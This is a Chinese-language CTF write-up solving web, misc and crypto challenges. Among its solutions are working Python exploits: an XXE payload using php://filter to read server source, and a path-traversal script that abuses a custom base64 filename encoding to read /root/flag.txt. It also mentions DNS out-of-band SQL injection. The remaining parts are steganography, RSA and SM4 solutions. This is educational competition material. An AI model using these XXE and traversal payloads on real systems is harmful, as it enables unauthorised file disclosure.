Web

Game

开始给了一个游戏界面,测试下,查看源码发现js:

//console.log(score);
if (score == 15) {
    $.ajax({
        url: 'score.php',
        type: 'POST',
        data: 'score=' + score,
        success: function (data) {
            var data = data;
            $("#output").text(data);
            }
    })
}

看到score=15的时候就会利用ajax去访问score.php,直接构造请求,返回flag

import requests

url = "http://875f4b4a698e4c9987139eb295970a10430031901eab4d51.changame.ichunqiu.com/"
data = {
        "score":"15"
}

resp = requests.post(url+"score.php",data=data)
print resp.content

who_are_you?

进入题目有输入框,输入后会返回name:

image.png

查看源码发现:

function play() {
    return false;
}
function func() {
    // document.getElementById().value
    var xml = '' +
    '<\?xml version="1.0" encoding="UTF-8"\?>' +
    '<feedback>' +
    '<author>' + document.getElementById('name').value+ '</author>' +
    '</feedback>';
console.log(xml);
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
    if (xmlhttp.readyState == 4) {
    // console.log(xmlhttp.readyState);
    // console.log(xmlhttp.responseText);
    var res = xmlhttp.responseText;
    document.getElementById('title').textContent = res
    }
};
xmlhttp.open("POST", "index.php", true);
xmlhttp.send(xml);
return false;
};

发现是XML,想到XXE,直接构造xxe读取文件,发现可以读取任意文件:

image.png

一直没有找到flag文件,最后才发现flag在index里,php伪协议base64编码读取index

#-*-coding:utf-8
import requests
import base64

url = "http://f9fb5ccc74b7422fac3b155bc5e09feafbaf03606d0844d9.changame.ichunqiu.com/"
xml = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >]>
<feedback>
<author>&xxe;</author>
</feedback>
'''

resp = requests.post(url,data=xml)
print base64.b64decode(resp.content)

show_me_your_image

题目给了一个上传图片的页面

image.png

上传成功,F12会看到 base64 编码的文件路径,并且可以访问查看图片,但是base64是变形的base64更换了密码表

image.png

开始的思路一直是爆破出新的编码表,因为我们可以构造任意文件名将得到的文件路径与正常base64编码进行比较,这样就可以爆破出来。思路一开始就偏了。。虽然也爆破出了密码表。。

@impakho师傅说不用爆密码表直接构造文件名,让它帮我们编码,就可以了。

采用@impakho师傅的思路,但是只上传允许 图片文件扩展名的文件 ,因此必须是 图片文件扩展名 结尾。

利用 base643字节 编码得到 4字节 的原理,文件名部分可以用 / 填充至能被 3 整除,这样 扩展名部分 始终在一个分组的开头,使得每次编码结果相等,这样就可以得到任意文件名的编码后的值,利用这个加密目录穿越的路径,读取任意文件。

#-*-coding:utf-8

import requests
import base64
import urllib
import re

url = "http://9a297f1016124ab8aba242337b0b8b0af29082d5ee2e4bfc.changame.ichunqiu.com/"
path = "../../../../../../../../../.././root/flag.txt"
# ../../../../../../../../../../..//proc/self/cwd/app.py
# ../../../../../../../../../../..//proc/self/cwd/templates/upload.html(Tip2:templates/upload.html)
# ../../../../../../../../../.././root/flag.txt(upload.html)
lenth = len(base64.b64encode(path))
files = {
        "file":(path+'.jpg','a')
}

html = requests.post(url+'upload.php',files=files).text
tmp = urllib.unquote(html.split("img.php?name=")[1].split("\">")[0])
name = urllib.quote(str(tmp)[0:lenth])
print name
resp = requests.get(url+'img.php?name='+name)
print resp.text

Flag: flag{cb74b4ef-9fbd-472a-b29b-9c1848880a07}

按F注入

hint:不是所有sql都叫PostgreSQL hint2: dns

一道注入题目,查看源码会发现注入点:?f=1

引号测试注入,发现:

要么正常,要么弹窗报错

思路:dns外带注入

参考:Facebook CTF 2019 - Web

Misc

签到题

I'm gamectf.com, I love TXT.

查看 gamectf.com 域名的 TXT 记录

image.png

七代目

题目给了一gif图片,identify命令分解GIF,查看每一帧

identify -format "%s %T \n" “./1.gif'

可以看到第六帧和其他的不一样,分离图片,Stegsolve换色道查看图片发现flag

Flag: flag{49bdbe-abfe-472-9f66-a533331e6}

亚萨西

解压需要密码,Winhex看下得到密码:loli

解压得到图片,Winhex最后看到Ook!编码,在线解密得到flag

004.png

24word

社会主义核心价值观解码得到:CodeValues

binwalk看下图片发现压缩包,修改后缀为zip,密码CodeValues解码得到图片

图片下部存在二维码,Stegsolve换下色道,扫描二维码得到flag

005.png

Flag: flag{24_word_m4n7ra}

Crypto

dp

已知,e n dp c,泄露dp

Exp:

import gmpy2
import libnum
e = 65537
n = 9637571466652899741848142654451413405801976834328667418509217149503238513830870985353918314633160277580591819016181785300521866901536670666234046521697590230079161867282389124998093526637796571100147052430445089605759722456767679930869250538932528092292071024877213105462554819256136145385237821098127348787416199401770954567019811050508888349297579329222552491826770225583983899834347983888473219771888063393354348613119521862989609112706536794212028369088219375364362615622092005578099889045473175051574207130932430162265994221914833343534531743589037146933738549770365029230545884239551015472122598634133661853901
dp = 81339405704902517676022188908547543689627829453799865550091494842725439570571310071337729038516525539158092247771184675844795891671744082925462138427070614848951224652874430072917346702280925974595608822751382808802457160317381440319175601623719969138918927272712366710634393379149593082774688540571485214097
c = 5971372776574706905158546698157178098706187597204981662036310534369575915776950962893790809274833462545672702278129839887482283641996814437707885716134279091994238891294614019371247451378504745748882207694219990495603397913371579808848136183106703158532870472345648247817132700604598385677497138485776569096958910782582696229046024695529762572289705021673895852985396416704278321332667281973074372362761992335826576550161390158761314769544548809326036026461123102509831887999493584436939086255411387879202594399181211724444617225689922628790388129032022982596393215038044861544602046137258904612792518629229736324827

for i in range(1,65538):
    if (dp*e-1)%i == 0:
        if n%(((dp*e-1)/i)+1)==0:
            p=((dp*e-1)/i)+1
            q=n/(((dp*e-1)/i)+1)
            phi = (p-1)*(q-1)
            d = gmpy2.invert(e,phi)%phi
            print libnum.n2s(pow(c,d,n))

Flag: flag{c3009b61-f9ed-4b20-8855-edab53e89530}

sm4

sm4加密,国密算法的一种,对称加密算法,采用分组加密,关于sm4可以参考:SM4

已知key、c,参考解密脚本修改下:

Exp:

#-*-coding:utf-8
# S盒
SboxTable = \
[
    0xd6, 0x90, 0xe9, 0xfe, 0xcc, 0xe1, 0x3d, 0xb7, 0x16, 0xb6, 0x14, 0xc2, 0x28, 0xfb, 0x2c, 0x05,
    0x2b, 0x67, 0x9a, 0x76, 0x2a, 0xbe, 0x04, 0xc3, 0xaa, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99,
    0x9c, 0x42, 0x50, 0xf4, 0x91, 0xef, 0x98, 0x7a, 0x33, 0x54, 0x0b, 0x43, 0xed, 0xcf, 0xac, 0x62,
    0xe4, 0xb3, 0x1c, 0xa9, 0xc9, 0x08, 0xe8, 0x95, 0x80, 0xdf, 0x94, 0xfa, 0x75, 0x8f, 0x3f, 0xa6,
    0x47, 0x07, 0xa7, 0xfc, 0xf3, 0x73, 0x17, 0xba, 0x83, 0x59, 0x3c, 0x19, 0xe6, 0x85, 0x4f, 0xa8,
    0x68, 0x6b, 0x81, 0xb2, 0x71, 0x64, 0xda, 0x8b, 0xf8, 0xeb, 0x0f, 0x4b, 0x70, 0x56, 0x9d, 0x35,
    0x1e, 0x24, 0x0e, 0x5e, 0x63, 0x58, 0xd1, 0xa2, 0x25, 0x22, 0x7c, 0x3b, 0x01, 0x21, 0x78, 0x87,
    0xd4, 0x00, 0x46, 0x57, 0x9f, 0xd3, 0x27, 0x52, 0x4c, 0x36, 0x02, 0xe7, 0xa0, 0xc4, 0xc8, 0x9e,
    0xea, 0xbf, 0x8a, 0xd2, 0x40, 0xc7, 0x38, 0xb5, 0xa3, 0xf7, 0xf2, 0xce, 0xf9, 0x61, 0x15, 0xa1,
    0xe0, 0xae, 0x5d, 0xa4, 0x9b, 0x34, 0x1a, 0x55, 0xad, 0x93, 0x32, 0x30, 0xf5, 0x8c, 0xb1, 0xe3,
    0x1d, 0xf6, 0xe2, 0x2e, 0x82, 0x66, 0xca, 0x60, 0xc0, 0x29, 0x23, 0xab, 0x0d, 0x53, 0x4e, 0x6f,
    0xd5, 0xdb, 0x37, 0x45, 0xde, 0xfd, 0x8e, 0x2f, 0x03, 0xff, 0x6a, 0x72, 0x6d, 0x6c, 0x5b, 0x51,
    0x8d, 0x1b, 0xaf, 0x92, 0xbb, 0xdd, 0xbc, 0x7f, 0x11, 0xd9, 0x5c, 0x41, 0x1f, 0x10, 0x5a, 0xd8,
    0x0a, 0xc1, 0x31, 0x88, 0xa5, 0xcd, 0x7b, 0xbd, 0x2d, 0x74, 0xd0, 0x12, 0xb8, 0xe5, 0xb4, 0xb0,
    0x89, 0x69, 0x97, 0x4a, 0x0c, 0x96, 0x77, 0x7e, 0x65, 0xb9, 0xf1, 0x09, 0xc5, 0x6e, 0xc6, 0x84,
    0x18, 0xf0, 0x7d, 0xec, 0x3a, 0xdc, 0x4d, 0x20, 0x79, 0xee, 0x5f, 0x3e, 0xd7, 0xcb, 0x39, 0x48,
]

# 常数FK
FK = [0xa3b1bac6, 0x56aa3350, 0x677d9197, 0xb27022dc] ; ENCRYPT = 0 ;DECRYPT = 1

# 固定参数CK
CK = \
[
    0x00070e15, 0x1c232a31, 0x383f464d, 0x545b6269,
    0x70777e85, 0x8c939aa1, 0xa8afb6bd, 0xc4cbd2d9,
    0xe0e7eef5, 0xfc030a11, 0x181f262d, 0x343b4249,
    0x50575e65, 0x6c737a81, 0x888f969d, 0xa4abb2b9,
    0xc0c7ced5, 0xdce3eaf1, 0xf8ff060d, 0x141b2229,
    0x30373e45, 0x4c535a61, 0x686f767d, 0x848b9299,
    0xa0a7aeb5, 0xbcc3cad1, 0xd8dfe6ed, 0xf4fb0209,
    0x10171e25, 0x2c333a41, 0x484f565d, 0x646b7279
]



def padding(data):   #填充
    print ("plaintext:\t", bytes (data))
    file_data_list = list(data)

    lenth = len (file_data_list)
    #print ("data lenth:", lenth)
    remainder = lenth % 16
    if remainder != 0:
        i=16-remainder               #i为需要填充的位数
        #print ("padding numbers = ", i)
        for j in range(i):
           file_data_list.append(i)  #填充 char 0-(i-1)
    if remainder == 0:
        for k in range(16):
            file_data_list.append (0x08)  #刚好的话 填充0x08
    print("after PKCS5 padding:",file_data_list)
    return file_data_list


def list_4_8_to_int32(key_data):  # 列表4个8位,组成32位
    return int ((key_data[0] << 24) | (key_data[1] << 16) | (key_data[2] << 8) | (key_data[3]))



def n32_to_list4_8(n):  #把n分别取32位的每8位放入列表
    return [int ((n >> 24) & 0xff), int ((n >> 16) & 0xff), int ((n >> 8) & 0xff), int ((n) & 0xff)]


#循环左移
def shift_left_n(x, n):
    return int (int (x << n) & 0xffffffff)

def shift_logical_left(x, n):
    return shift_left_n (x, n) | int ((x >> (32 - n)) & 0xffffffff)  #两步合在一起实现了循环左移n位


def XOR(a, b):
    return list (map (lambda x, y: x ^ y, a, b))


#s盒查找
def sbox(idx):
    return SboxTable[idx]



def extended_key_LB(ka):      #拓展密钥算法LB
    a = n32_to_list4_8 (ka)                #a是ka的每8位组成的列表
    b = [sbox (i) for i in a]               #在s盒中每8位查找后,放入列表b,再组合成int bb
    bb = list_4_8_to_int32 (b)
    rk = bb ^ (shift_logical_left (bb, 13)) ^ (shift_logical_left (bb, 23))
    return rk

def linear_transform_L(ka):      #线性变换L
    a = n32_to_list4_8 (ka)
    b = [sbox (i) for i in a]
    bb = list_4_8_to_int32 (b)     #bb是经过s盒变换的32位数
    return bb ^ (shift_logical_left (bb, 2)) ^ (shift_logical_left (bb, 10)) ^ (shift_logical_left (bb, 18)) ^ (shift_logical_left (bb, 24)) #书上公式


def sm4_round_function(x0, x1, x2, x3, rk):   #轮函数
    return (x0 ^ linear_transform_L (x1 ^ x2 ^ x3 ^ rk))


class Sm4 (object):
    def __init__(self):
        self.sk = [0] * 32
        self.mode = ENCRYPT

    def sm4_set_key(self, key_data, mode):    #先算出拓展密钥
        self.extended_key_last (key_data, mode)

    def extended_key_last(self, key, mode):   #密钥扩展算法
        MK = [0, 0, 0, 0]
        k = [0] * 36
        MK[0] = list_4_8_to_int32 (key[0:4])
        MK[1] = list_4_8_to_int32 (key[4:8])
        MK[2] = list_4_8_to_int32 (key[8:12])
        MK[3] = list_4_8_to_int32 (key[12:16])
        k[0:4] = XOR (MK, FK)
        for i in range (32):
            k[i + 4] = k[i] ^ (extended_key_LB (k[i + 1] ^ k[i + 2] ^ k[i + 3] ^ CK[i]))
        self.sk = k[4:]   #生成的32轮子密钥放到sk中


        self.mode = mode
        if mode == DECRYPT:      #解密时rki逆序
            self.sk.reverse ()

    def sm4_one_round(self, sk, in_put):   #一轮算法 ,4个32位的字=128bit=16个字节(8*16)
        item = [list_4_8_to_int32 (in_put[0:4]), list_4_8_to_int32 (in_put[4:8]), list_4_8_to_int32 (in_put[8:12]),
                list_4_8_to_int32 (in_put[12:16])]    #4字节一个字,把每4个字节变成32位的int
        x=item

        for i in range (32):
            temp=x[3]
            x[3] = sm4_round_function (x[0], x[1], x[2], x[3], sk[i]) #x[3]成为x[4]
            x[0]=x[1]
            x[1]=x[2]
            x[2]=temp

            print("%dround----->"%(i+1),"key:%-12d\n"%sk[i],"result:",x)
        res=x
        # res = reduce (lambda x, y: [x[1], x[2], x[3], sm4_round_function (x[0], x[1], x[2], x[3], y)],sk, item) #32轮循环加密
        res.reverse ()
        rev = map (n32_to_list4_8, res)
        out_put = []
        [out_put.extend (_) for _ in rev]
        return out_put

    def encrypt(self, input_data):
        # 块加密
        output_data = []
        tmp = [input_data[i:i + 16] for i in range (0, len (input_data), 16)]  #输入数据分块
        [output_data.extend (each) for each in map (lambda x: self.sm4_one_round (self.sk, x), tmp)]
        return output_data


def encrypt(mode, key, data):
    sm4_d = Sm4 ()
    sm4_d.sm4_set_key (key, mode)
    en_data = sm4_d.encrypt (data)
    return en_data


def sm4_crypt_cbc(mode, key, iv, data):
    sm4_d = Sm4 ()
    sm4_d.sm4_set_key (key, mode)
    en_data = sm4_d.sm4_crypt_cbc (iv, data)
    return en_data

if __name__ == "__main__":

    key_data=[13, 204, 99, 177, 254, 41, 198, 163, 201, 226, 56, 214, 192, 194, 98, 104]

    sm4_d = Sm4()
    en_data=[46, 48, 220, 156, 184, 218, 57, 13, 246, 91, 1, 63, 60, 67, 105, 64, 149, 240, 217, 77, 107, 49, 222, 61, 155, 225, 231, 196, 167, 121, 9, 16, 60, 182, 65, 101, 39, 253, 250, 224, 9, 204, 154, 122, 206, 43, 97, 59]

    sm4_d.sm4_set_key (key_data, DECRYPT)
    de_data = sm4_d.encrypt (en_data)
    print "plaintext:",de_data

    flag = ""
    for i in de_data:
        flag += chr(i)
    print flag

Flag: flag{1caa96be-4266-4a8e-bd2c-ece977495497}